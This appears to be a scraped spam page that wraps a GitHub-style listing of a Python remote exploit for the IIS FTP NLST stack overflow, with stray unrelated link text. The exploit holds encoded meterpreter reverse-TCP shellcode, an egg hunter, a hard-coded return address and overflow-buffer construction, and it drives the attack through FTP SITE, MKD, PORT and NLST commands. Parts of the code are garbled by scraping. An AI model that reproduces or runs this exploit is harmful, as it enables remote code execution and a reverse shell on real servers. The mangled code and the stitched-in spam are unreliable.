Microsoft Ftp Service Exploit
4/29/2019 admin
Permalink
SAINT Exploits. Microsoft IIS FTP Server NLST Command Remote Overflow. More info here. Name: Internet Information Services (IIS) FTP Service Remote Code Execution Vulnera. File: nvt/secpod_ms11-004.nasl.
Join GitHub today
Cara program pabx panasonic kx-ta308. GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together. Bat for lashes two suns 320 rar.
Sign upBranch:master
Find file Copy path
Microsoft Ftp Service Exploit
1 contributor
| #https://www.exploit-db.com/exploits/16740/ |
| # /usr/share/exploitdb/platforms/windows/remote/16740.rb |
| # Microsoft IIS FTP Server NLST Response Overflow |
| import socket |
| import sys |
| import time |
| import random |
| import string |
| import threading |
| from struct import pack |
| from ftplib importFTP |
| import SocketServer |
| #Shellcode 490 bytes including nops |
| # This is for the stored payload, the real BadChar list for file paths is: |
| #'BadChars' => 'x00x09x0cx20x0ax0dx0b', |
| # x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x22x2ax2ex2fx3ax3cx3ex3fx5cx7c |
| # Shellcode excluding nops 366 |
| # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 > payload |
| # perl -e 'print 'x81xecxacx0dx00x00' > stackadj |
| # cat stackadj payload > shellcode |
| # cat shellcode msfvenom -b 'x00x09x0cx20x0ax0dx0b' -e x86/shikata_ga_nai -t python |
| shellcode ='' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='x90x90x90x90x90x90x90x90x90x90x90x90x90' |
| shellcode +='xdaxcbxb8x64x94xd5xb5xd9x74x24xf4x5fx33' |
| shellcode +='xc9xb1x55x31x47x1ax03x47x1ax83xc7x04xe2' |
| shellcode +='x91x15x39x19x54x16xc2x9ex8ex94xc2x5ex4e' |
| shellcode +='xf9x4bxbbx7fx39x2fxcfx2fx89x3bx9dxc3x62' |
| shellcode +='x69x36x50x06xa6x39xd1xadx90x74xe2x9exe1' |
| shellcode +='x17x60xddx35xf8x59x2ex48xf9x9ex53xa1xab' |
| shellcode +='x77x1fx14x5cxfcx55xa5xd7x4ex7bxadx04x06' |
| shellcode +='x7ax9cx9ax1dx25x3ex1cxf2x5dx77x06x17x5b' |
| shellcode +='xc1xbdxe3x17xd0x17x3axd7x7fx56xf3x2ax81' |
| shellcode +='x9ex33xd5xf4xd6x40x68x0fx2dx3bxb6x9axb6' |
| shellcode +='x9bx3dx3cx13x1ax91xdbxd0x10x5exafxbfx34' |
| shellcode +='x61x7cxb4x40xeax83x1bxc1xa8xa7xbfx8ax6b' |
| shellcode +='xc9xe6x76xddxf6xf9xd9x82x52x71xf7xd7xee' |
| shellcode +='xd8x9fx14xc3xe2x5fx33x54x90x6dx9cxcex3e' |
| shellcode +='xddx55xc9xb9x22x4cxadx56xddx6fxcex7fx19' |
| shellcode +='x3bx9ex17x88x44x75xe8x35x91xe0xedxa1x10' |
| shellcode +='xfexedxe1x4dx02xeex10xd2x8bx08x42xbaxdb' |
| shellcode +='x84x22x6ax9cx74xcax60x13xaaxeax8axf9xc3' |
| shellcode +='x80x64x54xbbx3cx1cxfdx37xddxe1x2bx32xdd' |
| shellcode +='x6axdexc2x93x9axabxd0xc3xfax53x29x13x97' |
| shellcode +='x53x43x17x31x03xfbx15x64x63xa4xe6x43xf7' |
| shellcode +='xa3x18x12xcexd8x2ex80x6exb7x4ex44x6fx47' |
| shellcode +='x18x0ex6fx2fxfcx6ax3cx4ax03xa7x50xc7x91' |
| shellcode +='x48x01xbbx32x21xafxe2x74xeex50xc1x07xe9' |
| shellcode +='xafx97x25x52xd8x67x69x62x18x02x69x32x70' |
| shellcode +='xd9x46xbdxb0x22x4dx96xd8xa9x03x54x78xad' |
| shellcode +='x0ex38x24xaexbcxe1x31x21x43x16x3exc3x78' |
| shellcode +='xc0x07xb1xb9xd0x33xcaxf0x75x15x41xfax2a' |
| shellcode +='x65x40x90x90x90x90x90x90x90' |
| defusage(): |
| print'Usage: python %s Target_IP [Port] ([FTP_username] [FTP_password])'% sys.argv[0] |
| print'Arguments:' |
| print'Target_IP Required IP of target FTP server' |
| print'Port Optional (default: 21) Port target FTP server is hosted on' |
| print'FTP_username Optional (default: anonymous) User to be passed to target FTP server' |
| print'FTP_password Optional (default: anonymous) Password to be passed to target FTP server' |
| print'**NOTE: ftp_user AND ftp_pass must both be given or defaults will be applied**' |
| #lazy parsing.. sue me :P |
| defparse_args(): |
| global ip |
| global port |
| global ftp_user |
| global ftp_pass |
| #parse args |
| if (len(sys.argv) <2) or (len(sys.argv) >5): |
| usage() |
| sys.exit(0) |
| if sys.argv 2: |
| ip = sys.argv[1] |
| port =int(sys.argv[2]) |
| ftp_user ='anonymous' |
| ftp_pass ='anonymous' |
| elif sys.argv 5: |
| ip = sys.argv[1] |
| port =int(sys.argv[2]) |
| ftp_user = sys.argv[3] |
| ftp_pass = sys.argv[4] |
| else: |
| ip = sys.argv[1] |
| port =21 |
| ftp_user ='anonymous' |
| ftp_pass ='anonymous' |
| #code stolen from Alexander Korznikov. |
| #Source http://www.korznikov.com/2015/04/convert-any-string-into-hex-x41x41.html |
| defstring2hex(string): |
| b = string |
| return'%s'% (''.join(['x%02X'%ord( x ) for x in b])) |
| defrandom_hex_string(size=4, chars=string.ascii_uppercase): |
| ascii_string =''.join(random.choice(chars) for _ inrange(size)) |
| #hex_string = string2hex(ascii_string) |
| #return hex_string |
| return ascii_string |
| defdrop_shellcode(ftp_server, shellcode, egg): |
| encoded_shellcode = shellcode.replace('xff', 'xffxff') |
| i =0 |
| while i <5: |
| #data = sock.send('SITE ' + egg + encoded_shellcode) |
| #data = sock.recv(1024) |
| #print data |
| try: |
| ftp_server.sendcmd('SITE '+ egg + encoded_shellcode) |
| except: |
| pass |
| print'[+] Completed pass 1..' |
| i = i+1 |
| defbuild_directory_buffer(egg,patch,ret): |
| hunt ='xB8x55x55x52x55x35x55x55x55x55x40x81x38'+egg +'x75xF7x40x40x40x40xFFxE0' |
| global pre |
| pre = random_hex_string(3) |
| pst =list(random_hex_string(210)) |
| pst[0:4] =list(patch) |
| pst[90:94] =list(patch) |
| pst[94:98] =list(patch) |
| pst[140:172] = (list(patch))*8 |
| pst[158:162] =list(ret) |
| pst[182:187] =list('xe9') +list(pack('<i', -410)) |
| pst =''.join(pst) |
| pst = pst.replace('xff', 'xffxff') |
| directory_buffer = pre+pst |
| return directory_buffer |
| classThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): |
| defhandle(self): |
| data =self.request.recv(1024) |
| cur_thread = threading.current_thread() |
| #response = '{}: {}'.format(cur_thread.name, data) |
| #self.request.sendall(response) |
| classThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): |
| pass |
| defcreate_tcp_server(HOST='0.0.0.0', PORT=0): |
| server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler) |
| # Start a thread with the server -- that thread will then start one |
| # more thread for each request |
| server_thread = threading.Thread(target=server.serve_forever) |
| # Exit the server thread when the main thread terminates |
| server_thread.daemon =True |
| server_thread.start() |
| return server |
| defmain(): |
| print'IIS 5.0 FTP Remote Stack Overflow Exploit by Disc0rdantMel0dy' |
| parse_args() |
| #create socket |
| try: |
| ftp_server = FTP() |
| print'[+] Connecting to FTP Server: %s on port %d'% (ip, port) |
| ftp_server.connect(ip,port,timeout=30) |
| except: |
| print'[!] Could not connect to FTP Server: %s on port %d'% (ip, port) |
| sys.exit(-1) |
| print'[+] Connected! Waiting for welcome banner..' |
| print ftp_server.getwelcome() |
| #Attempt logon to FTP server |
| print'[+] Attemping FTP Logon with creds: %s / %s'%(ftp_user, ftp_pass) |
| try: |
| ftp_server.login(user=ftp_user, passwd=ftp_pass) |
| print'[+] Successfully logged in with creds: %s / %s'%(ftp_user,ftp_pass) |
| except: |
| '[!] Invalid FTP Credentials. If using default credentials please try again specifying valid credentials. Exiting..' |
| sys.exit(-1) |
| ret = pack('<i', 0x77e42ed8) |
| print'[+] Using return address of %s'% string2hex(ret) |
| patch = pack('<i', 0x7ffd7ffd) |
| #build egg for hunter to point to shellcode |
| egg = random_hex_string(4) |
| print'[+] Using %s as location for shellcode'% string2hex(egg) |
| #drop shellcode onto stack |
| print'[+] Dropping shellcode onto stack.' |
| drop_shellcode(ftp_server, shellcode, egg) |
| print'[+] Building attack buffer for directory name' |
| d_buffer = build_directory_buffer(egg, patch, ret) |
| #send overflow directory buffer |
| print'[+] Creating long directory..' |
| try: |
| data = ftp_server.mkd(d_buffer) |
| print data |
| except: |
| print'[!] Unexpected response from FTP Server.' |
| print'[!] Most likely cause is that the user does not have write permissions to FTP root directory.' |
| print'[!] You should retry the exploit with different credentials if they are available.' |
| print'[!] Exiting..' |
| sys.exit(-1) |
| #data = sock.recv(1024) |
| #print data |
| #if str(data).startswith('257'): |
| # print '[+] Directory Successfuly Created!' |
| #else: |
| # print '[!] Unexpected response from FTP Server.' |
| # print '[!] Most likely cause is that the user does not have write permissions to FTP root directory.' |
| # print '[!] You should retry the exploit with different credentials if they are available.' |
| # print '[!] Exiting..' |
| # sys.exit(-1) |
| #start TCP server for FTP server to connect to |
| print'[+] Starting local TCP server..' |
| srv = create_tcp_server(HOST='192.168.56.1',PORT=0). |
| #get info for PORT address |
| srv_port1 = srv.server_address[1] /256 |
| srv_port2 = srv.server_address[1] %256 |
| #build address for PORT command |
| srv_address ='%s,%s,%s'% (str(srv.server_address[0]).replace('.',','), srv_port1, srv_port2) |
| #send PORT command |
| print'[+] Sending Port Command..' |
| data = ftp_server.sendcmd('PORT %s'% srv_address) |
| print data |
| #trigger vulnerability |
| print'[+] Sending NLIST command to trigger vulnerability..' |
| dir_name ='%s*/./%s*/'% (d_buffer, pre) |
| data = ftp_server.nlst(dir_name) |
| print data |
| main() |
Copy lines Copy permalink